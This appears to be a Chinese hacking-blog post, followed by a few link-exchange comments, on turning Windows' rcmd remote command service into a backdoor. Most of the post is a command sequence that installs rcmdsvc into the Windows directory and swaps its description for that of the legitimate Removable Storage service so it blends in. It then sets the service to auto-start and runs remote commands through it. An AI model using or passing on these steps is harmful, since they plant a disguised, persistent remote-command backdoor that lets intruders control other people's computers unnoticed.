windows自带的rcmd后门使用方法整理

文章作者:pt007[at]vip.sina.com版权所有,转载请注明
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)

1、rcmdsvc /install //安装后的服务名为:Remote Command Service (rcmdsvc),建议上传至windows目录
怎么用命令行改服务名和描述:
sc \\127.0.0.1 query rcmdsvc //查询整个服务
sc \\127.0.0.1 qdescription rcmdsvc //查询服务的描述
sc \\127.0.0.1 description rcmdsvc "管理和编录可移动媒
体并操作自动化可移动媒体设备。如果这个服务被停止,依赖可移动存储的程序,如备份和
远程存储将放慢速度。如果禁用这个服务,所有专依赖这个服务的服务将无法启动。" //修改服务的描述
D:\pt007\f\Pstools2.11>psservice \\127.0.0.1 setconfig rcmdsvc auto //设置服务为自动启动
2、net start rcmdsvc
3、rcmd \\127.0.0.1 ver

rcmd.zip

相关日志

楼被抢了 2 层了... 抢座Rss 2.0或者 Trackback

  • 源子

    加你链接很久啦,你都没鸟起我啦
    厚脸皮过来申请一下啦 http://www.shadowsky.cn

  • 鬼仔

    我也不知道你加了我链接。。
    我现在去把你的加上,不过我这里的链接好混乱。。 :oops:

发表评论